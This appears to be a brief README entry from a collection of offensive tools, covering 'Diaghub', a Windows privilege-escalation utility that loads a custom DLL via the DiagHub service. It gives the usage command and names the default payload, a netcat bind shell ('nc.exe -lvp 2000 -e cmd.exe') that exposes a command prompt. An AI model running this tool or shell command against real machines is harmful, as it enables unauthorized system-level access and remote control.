Home

Awesome

Diaghub

Loads a custom dll in system32 via diaghub.

Example:

Get the dll via some other vulnerability into C:\Windows\System32 and run:

diaghub.exe c:\\ProgramData\\ xct.dll

The default payload will run C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe